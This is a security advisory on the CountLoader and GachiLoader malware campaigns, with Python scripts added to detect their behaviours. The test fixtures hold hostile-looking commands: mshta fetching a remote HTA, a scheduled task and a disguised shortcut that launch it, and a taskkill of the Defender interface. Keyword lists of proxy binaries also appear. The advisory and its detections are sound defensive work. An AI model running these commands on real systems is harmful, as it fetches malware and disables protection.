CountLoader and GachiLoader Malware Targeting Windows Systems via Cracked Software and YouTube Campaigns
- Rescana
- Dec 21, 2025
- 5 min read

Executive Summary
A new wave of cyberattacks is exploiting the popularity of cracked software and the reach of YouTube to distribute two highly sophisticated malware loaders: CountLoader and GachiLoader. These loaders are engineered to deliver a variety of secondary payloads, including advanced information stealers and remote access tools, while employing advanced evasion techniques such as fileless execution, signed binary proxy abuse, and novel process injection. The campaign is notable for its technical depth, its use of social engineering, and its ability to propagate through both digital and physical vectors, including removable media. The threat is opportunistic, targeting any Windows system where users are lured into executing malicious files, and poses a significant risk to both individuals and organizations.
Threat Actor Profile
The operators behind the CountLoader and GachiLoader campaigns have not been definitively attributed to any known Advanced Persistent Threat (APT) group. Analysis of their tactics, techniques, and procedures (TTPs) suggests a financially motivated cybercrime group rather than a state-sponsored actor. The campaign leverages a broad, opportunistic targeting model, focusing on users seeking pirated software and exploiting compromised YouTube accounts to maximize reach. The technical sophistication of the malware, including anti-analysis features, advanced persistence mechanisms, and the use of legitimate binaries for execution, indicates a well-resourced and experienced threat actor. The group demonstrates a strong understanding of both social engineering and endpoint security evasion, and is capable of rapidly adapting its infrastructure and payloads in response to detection.
Technical Analysis of Malware/TTPs
CountLoader
CountLoader is typically delivered via cracked software sites. The infection chain begins when a user downloads a ZIP archive from a file-sharing service such as MediaFire. The archive contains an encrypted ZIP file, a Microsoft Word document with the decryption password, and a renamed legitimate Python interpreter (Setup.exe). Upon execution, the Python interpreter is configured to run a malicious command that retrieves the CountLoader payload from a remote server using mshta.exe, a signed Windows binary often abused for proxy execution.
Persistence is established through a scheduled task named GoogleTaskSystem136.0.7023.12, set to execute every 30 minutes for a decade. The loader checks for the presence of CrowdStrike Falcon via WMI queries and modifies its behavior if detected, demonstrating anti-analysis awareness. CountLoader can download and execute EXEs, DLLs (via rundll32.exe), MSI installers, or Python modules, and is capable of removing its own scheduled tasks to evade forensic analysis. It collects and exfiltrates system information and propagates via USB drives by creating malicious LNK shortcuts that mimic legitimate files. The loader employs fileless execution through mshta.exe or PowerShell, making detection by traditional antivirus solutions challenging.
The final payload is often ACR Stealer, but observed secondary payloads include Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The campaign has been active since at least June 2025, with infections spreading through warez forums, cracked software aggregators, and removable media.
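The CountLoader chain described above leaves three artefacts in host telemetry that a detection engineer can key on: a PE whose internal name (python.exe) does not match the file name it runs under, a signed proxy binary such as mshta.exe being handed a URL, and a scheduled task with a vendor-lookalike name, a short repetition interval and a very long duration. The following Python is an added example written for this advisory, not Rescana's or any vendor's code. It runs over constructed Sysmon Event ID 1 records and a constructed Task Scheduler XML body of the kind carried in Security event 4698; the field names follow Sysmon, while the paths, the repetition values and the 203.0.113.10 address are assumptions or documentation values.

```python
# Added detection example for the CountLoader delivery chain (not Rescana's code).
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
USER_DIRS = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
PROXY_BINARIES = {"mshta.exe", "rundll32.exe", "powershell.exe"}
TASK_LAUNCHERS = {"mshta", "mshta.exe", "powershell", "powershell.exe", "rundll32", "rundll32.exe"}

# Constructed Sysmon Event ID 1 (process creation) records. Paths and the
# 203.0.113.0/24 address are documentation values, not real indicators.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\alice\Downloads\Setup\Setup.exe",
     "OriginalFileName": "python.exe",
     "CommandLine": r'"C:\Users\alice\Downloads\Setup\Setup.exe" -c "import os"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "OriginalFileName": "MSHTA.EXE",
     "CommandLine": "mshta http://203.0.113.10/x.hta",
     "ParentImage": r"C:\Users\alice\Downloads\Setup\Setup.exe"},
    {"Image": r"C:\Program Files\Python312\python.exe",
     "OriginalFileName": "python.exe",
     "CommandLine": "python.exe build.py",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# Constructed TaskContent body as Security event 4698 carries it; the
# repetition values mirror the "every 30 minutes for a decade" trigger.
SAMPLE_TASK_NAME = "GoogleTaskSystem136.0.7023.12"
SAMPLE_TASK_XML = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT30M</Interval><Duration>P3650D</Duration></Repetition>
    <StartBoundary>2025-06-01T00:00:00</StartBoundary>
  </TimeTrigger></Triggers>
  <Actions><Exec><Command>mshta</Command><Arguments>http://203.0.113.10/x.hta</Arguments></Exec></Actions>
</Task>"""


def is_renamed_interpreter(ev):
    """Masquerading: the PE version info says python.exe but the on-disk name differs."""
    orig = ev.get("OriginalFileName", "").lower()
    actual = PureWindowsPath(ev["Image"]).name.lower()
    return orig == "python.exe" and not actual.startswith("python")


def is_remote_proxy_execution(ev):
    """A signed proxy binary (mshta/rundll32/powershell) given a URL on its command line."""
    name = PureWindowsPath(ev["Image"]).name.lower()
    return name in PROXY_BINARIES and re.search(r"https?://", ev.get("CommandLine", ""), re.I) is not None


def spawned_from_user_dir(ev):
    """True when the parent process image lives in a user-writable directory."""
    return ev.get("ParentImage", "").lower().startswith(USER_DIRS)


def score_events(events):
    """Return [(image name, [reasons])] for every record that trips a rule."""
    findings = []
    for ev in events:
        reasons = []
        if is_renamed_interpreter(ev):
            reasons.append("renamed-python-interpreter")
        if is_remote_proxy_execution(ev):
            reasons.append("proxy-binary-remote-url")
            if spawned_from_user_dir(ev):
                reasons.append("parent-in-user-directory")
        if reasons:
            findings.append((PureWindowsPath(ev["Image"]).name, reasons))
    return findings


def parse_iso_duration_minutes(value):
    """Minimal ISO 8601 duration (days/hours/minutes, as Task Scheduler emits) to minutes."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?)?", value)
    if not m:
        return None
    days, hours, minutes = (int(x) if x else 0 for x in m.groups())
    return days * 1440 + hours * 60 + minutes


def task_is_suspicious(task_name, task_xml):
    """Flag vendor-lookalike names, high-frequency long-lived triggers and proxy-binary actions."""
    root = ET.fromstring(task_xml)
    reasons = []
    if re.fullmatch(r"Google\w*\d+(\.\d+){3}", task_name):  # e.g. GoogleTaskSystem136.0.7023.12
        reasons.append("vendor-lookalike-name")
    for rep in root.iterfind(".//t:Repetition", TASK_NS):
        interval = parse_iso_duration_minutes(rep.findtext("t:Interval", "", TASK_NS))
        duration = parse_iso_duration_minutes(rep.findtext("t:Duration", "", TASK_NS))
        if interval is not None and interval <= 30 and duration and duration >= 365 * 1440:
            reasons.append("high-frequency-long-lived-trigger")
    for cmd in root.iterfind(".//t:Exec/t:Command", TASK_NS):
        if (cmd.text or "").strip().lower().split("\\")[-1] in TASK_LAUNCHERS:
            reasons.append("proxy-binary-action")
    return reasons


if __name__ == "__main__":
    print(score_events(SAMPLE_EVENTS))
    print(task_is_suspicious(SAMPLE_TASK_NAME, SAMPLE_TASK_XML))
```

The renamed-interpreter rule relies on Sysmon's OriginalFileName field, which is taken from the PE version resource and survives a rename on disk; the third sample record (a legitimately named interpreter) is there to show the rule does not fire on ordinary Python use. The task rule is deliberately conservative: a task only scores on the trigger check when it is both frequent and long-lived, which is the combination the page describes and which legitimate updater tasks rarely share.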
GachiLoader
GachiLoader is distributed via a network of compromised YouTube accounts, referred to as the "YouTube Ghost Network." These accounts upload videos containing links to malicious installers, with over 100 flagged videos and approximately 220,000 views as of late 2025. The loader itself is a heavily obfuscated Node.js application, delivered as a JavaScript file.
Upon execution, GachiLoader performs several anti-analysis checks, including verifying administrative privileges using the net session command, attempting User Account Control (UAC) bypass, terminating SecHealthUI.exe (the Microsoft Defender user interface), and adding Defender exclusions for C:\Users\, C:\ProgramData\, and C:\Windows\. The loader fetches secondary payloads from remote URLs and uses a module named kidkadi.node to perform advanced PE injection via vectored exception handling, a technique that allows for stealthy, in-memory execution of malicious code.
Observed secondary payloads include Rhadamanthys (an information stealer) and Kidkadi (a custom PE injector). The loader's use of fileless, in-memory execution, combined with anti-AV and anti-analysis features, makes it highly evasive. The campaign leverages the trust and reach of YouTube, with malicious links placed in video descriptions and comments, and is capable of rapid propagation through social engineering.
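The defence-impairment steps above are the loudest part of the GachiLoader chain from a monitoring standpoint: every Defender exclusion it adds is recorded as a configuration-change event (Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log), and the net session privilege check and the SecHealthUI.exe kill are ordinary process creations. The Python below is an added example for this advisory, not Rescana's, Check Point's or any other vendor's code. It parses constructed 5007 message text and constructed process-creation records, correlates the behaviours back to the node.exe that caused them, and treats an exclusion as dangerous only when it covers a whole system root. The message layout, the paths and the user names are assumptions.

```python
# Added detection example for GachiLoader's defence-impairment steps (not Rescana's code).
import re
from pathlib import PureWindowsPath

# An exclusion covering one of these roots neutralises Defender for nearly every file a loader drops.
BROAD_EXCLUSION_ROOTS = {r"c:\users", r"c:\programdata", r"c:\windows", r"c:"}

# Shape of the "New value:" line in a Defender 5007 message when an exclusion is added (assumed layout).
EXCLUSION_RE = re.compile(
    r"New value:\s*HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\"
    r"(?P<kind>Paths|Extensions|Processes)\\(?P<value>.+?)\s*=\s*0x0",
    re.I,
)

# Constructed 5007 messages: two broad roots from the page, one narrow build-cache exclusion as a control.
SAMPLE_DEFENDER_5007 = [
    r"Microsoft Defender Antivirus Configuration has changed. New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\ = 0x0",
    r"Microsoft Defender Antivirus Configuration has changed. New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\ = 0x0",
    r"Microsoft Defender Antivirus Configuration has changed. New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\D:\Builds\cache\ = 0x0",
]

# Constructed process-creation records (Sysmon Event ID 1 field names); the last one is benign.
SAMPLE_PROCESSES = [
    {"Image": r"C:\Windows\System32\taskkill.exe", "CommandLine": "taskkill /F /IM SecHealthUI.exe",
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\node.exe"},
    {"Image": r"C:\Windows\System32\net.exe", "CommandLine": "net session",
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\node.exe"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\node.exe", "CommandLine": r"node.exe C:\Users\bob\Downloads\installer.js",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\net.exe", "CommandLine": r"net use Z: \\fileserver\share",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]


def broad_exclusions(messages):
    """Return the normalised roots of every Paths exclusion that covers a whole system directory."""
    hits = []
    for msg in messages:
        m = EXCLUSION_RE.search(msg)
        if not m:
            continue
        value = m.group("value").strip().rstrip("\\").lower()
        if m.group("kind").lower() == "paths" and value in BROAD_EXCLUSION_ROOTS:
            hits.append(value)
    return hits


def defender_ui_kill(ev):
    """taskkill aimed at the Defender user interface process."""
    name = PureWindowsPath(ev["Image"]).name.lower()
    return name == "taskkill.exe" and "sechealthui.exe" in ev["CommandLine"].lower()


def privilege_probe(ev):
    """'net session' succeeds only when elevated, so loaders use it as an admin check."""
    name = PureWindowsPath(ev["Image"]).name.lower()
    return name == "net.exe" and re.fullmatch(r"\s*net(\.exe)?\s+session\s*", ev["CommandLine"], re.I) is not None


def node_from_user_path(ev):
    """A Node.js runtime executing out of a user-writable location rather than an installed path."""
    image = ev["Image"].lower()
    return PureWindowsPath(image).name == "node.exe" and image.startswith((r"c:\users", r"c:\programdata"))


def correlate(processes):
    """Group the behaviours by the process responsible for them, so a single node.exe
    that probed privileges, killed the Defender UI and ran from a user path stands out."""
    by_process = {}
    for ev in processes:
        if defender_ui_kill(ev):
            by_process.setdefault(ev["ParentImage"], set()).add("kills-SecHealthUI")
        if privilege_probe(ev):
            by_process.setdefault(ev["ParentImage"], set()).add("net-session-admin-check")
        if node_from_user_path(ev):
            by_process.setdefault(ev["Image"], set()).add("node-from-user-path")
    return {proc: sorted(tags) for proc, tags in by_process.items()}


if __name__ == "__main__":
    print(broad_exclusions(SAMPLE_DEFENDER_5007))
    print(correlate(SAMPLE_PROCESSES))
```

Keying on the parent image is what turns three low-severity events into one high-confidence finding: a lone net session is noise, but a net session, a SecHealthUI.exe kill and a node.exe running from a temp directory that all share a parent is the sequence the page describes. The narrow D:\Builds\cache exclusion in the sample is left unflagged on purpose; alerting on every exclusion change buries the broad ones that actually matter.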
MITRE ATT&CK Mapping
Both CountLoader and GachiLoader employ a range of MITRE ATT&CK techniques, including T1189 (Drive-by Compromise), T1195 (Supply Chain Compromise), T1059.001 (PowerShell), T1218.005 (Mshta), T1053.005 (Scheduled Task), T1218 (Signed Binary Proxy Execution), T1027 (Obfuscated Files or Information), T1091 (Replication via Removable Media), T1005 (Data from Local System), and T1041 (Exfiltration Over C2 Channel). GachiLoader additionally uses T1059.007 (JavaScript), T1218.011 (Rundll32), T1548.002 (Bypass User Account Control), and T1562.001 (Impair Defenses: Disable or Modify Tools).
Exploitation in the Wild
The campaign is widespread, with infections reported globally. The primary victims are individuals seeking pirated software, but organizations are also at risk, particularly through the use of infected removable media. The "YouTube Ghost Network" has enabled the rapid dissemination of GachiLoader, with hundreds of thousands of potential exposures. While no major public breaches have been directly attributed to these loaders, security vendors including Cyderes, Check Point, and Fortinet have reported widespread infections and significant data theft. The campaign's opportunistic nature and use of social engineering make it a persistent threat to both consumers and enterprises.
Victimology and Targeting
The targeting is indiscriminate, focusing on users who download cracked software or follow YouTube links to external installers. There is no evidence of sector-specific or country-specific targeting. However, the use of removable media as a propagation vector increases the risk of lateral movement within organizational environments, especially where endpoint controls are weak or user awareness is low. The campaign's reliance on social engineering and user behavior underscores the importance of security awareness and robust endpoint protection.
Mitigation and Countermeasures
Organizations and individuals can reduce their risk of infection from CountLoader and GachiLoader by implementing the following countermeasures.
- Block the execution of mshta.exe and rundll32.exe from user directories using application control policies.
- Monitor for the creation of suspicious scheduled tasks, particularly those with names mimicking legitimate services such as GoogleTaskSystem136.0.7023.12 or those set to run at high frequency.
- Audit all removable media for the presence of malicious LNK files, and restrict the use of USB drives where possible.
- Monitor for unauthorized changes to Microsoft Defender settings, including the addition of exclusions for critical directories and the termination of SecHealthUI.exe.
- Block known command-and-control (C2) domains and URLs associated with CountLoader and GachiLoader as published in vendor threat intelligence reports.
- Educate users about the risks of downloading cracked software and following links from untrusted YouTube videos, emphasizing the dangers of social engineering and the importance of verifying the legitimacy of software sources.
- Employ advanced endpoint detection and response (EDR) solutions capable of detecting fileless and in-memory attacks, and ensure that all systems are regularly updated and patched.
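The removable-media audit recommended above can be scripted rather than done by eye, because a shortcut's real target and arguments are stored in the .lnk file in a documented binary layout (MS-SHLLINK). The Python below is an added example for this advisory, not Rescana's code. It implements a minimal shell-link reader (fixed header, optional IDList and LinkInfo skipped, then the string data) and flags shortcuts that are named like a document or picture but launch a script host or signed proxy binary, which is the propagation trick CountLoader uses on USB drives. The sample shortcut is constructed in code so the example runs offline; no real drive is read, and the helper that builds it, the file names and the 203.0.113.10 address are assumptions.

```python
# Added example: audit .lnk files for document-lookalike shortcuts (not Rescana's code).
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_REL_PATH, HAS_WORKING_DIR, HAS_ARGS, HAS_ICON = 0x04, 0x08, 0x10, 0x20, 0x40
IS_UNICODE = 0x80
LAUNCHERS = {"cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe", "wscript.exe", "cscript.exe"}
DOC_EXTENSIONS = (".docx", ".doc", ".pdf", ".xlsx", ".jpg", ".png", ".txt")
# Crude argument heuristics; "-enc" will also catch "-encoding", which is acceptable for an audit.
ARG_MARKERS = ("mshta", "http://", "https://", "-enc", "frombase64", "rundll32")


def parse_lnk(data):
    """Return the string-data fields of a shell link as a dict (minimal reader, added here)."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad CLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:  # IDListSize (2 bytes) followed by the item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize is the first field and covers the whole structure
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, key in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                      (HAS_ARGS, "arguments"), (HAS_ICON, "icon")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator follows
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields


def build_lnk(relative_path, arguments):
    """Construct a minimal .lnk carrying only a relative path and arguments (demo fixture, not a real shortcut)."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID, flags) + b"\x00" * (LNK_HEADER_SIZE - 24)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relative_path, arguments))
    return header + body


def lnk_verdict(filename, data):
    """Reasons a shortcut deserves attention; an empty list means nothing matched."""
    f = parse_lnk(data)
    target = (f.get("relative_path") or "").replace("/", "\\").split("\\")[-1].lower()
    args = f.get("arguments", "").lower()
    reasons = []
    if target in LAUNCHERS:
        reasons.append("launches-" + target)
    if any(marker in args for marker in ARG_MARKERS):
        reasons.append("remote-or-encoded-command")
    stem = filename.lower()
    stem = stem[:-4] if stem.endswith(".lnk") else stem
    if reasons and stem.endswith(DOC_EXTENSIONS):  # "Report.docx.lnk" shows as "Report.docx" in Explorer
        reasons.append("document-lookalike-name")
    return reasons


# Constructed fixtures: one lookalike shortcut and one ordinary folder shortcut.
SAMPLE_SHORTCUTS = {
    "Q3_Report.docx.lnk": build_lnk(r"..\..\Windows\System32\cmd.exe", r'/c start "" mshta http://203.0.113.10/u.hta'),
    "Photos.lnk": build_lnk(r".\Photos", ""),
}


def audit(shortcuts):
    """Map shortcut file name to its reasons, keeping only entries that tripped a rule."""
    return {name: reasons for name, data in shortcuts.items() if (reasons := lnk_verdict(name, data))}


if __name__ == "__main__":
    print(audit(SAMPLE_SHORTCUTS))
```

On a real drive the same audit is a directory walk that reads each *.lnk into parse_lnk; the reader deliberately stops after the string data, since the target, arguments and working directory are what an analyst needs and the trailing extra-data blocks add nothing to the verdict. Any file that raises ValueError is worth a look too: a .lnk extension on something that is not a shell link is itself unusual.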
References
- The Hacker News: Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware
- Check Point Research: GachiLoader Node.js Malware with API Tracing
- Cyderes Threat Intelligence: cyderes.com
- Fortinet CountLoader Analysis: fortinet.com/blog/threat-research
- Silent Push CountLoader Report: silentpush.com
- MITRE ATT&CK Framework: attack.mitre.org
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their digital supply chain. Our platform leverages advanced threat intelligence, continuous monitoring, and automated workflows to help organizations stay ahead of emerging threats and ensure the resilience of their business ecosystem. For more information about how Rescana can help you strengthen your cyber defense posture, or for any questions regarding this advisory, please contact us at ops@rescana.com.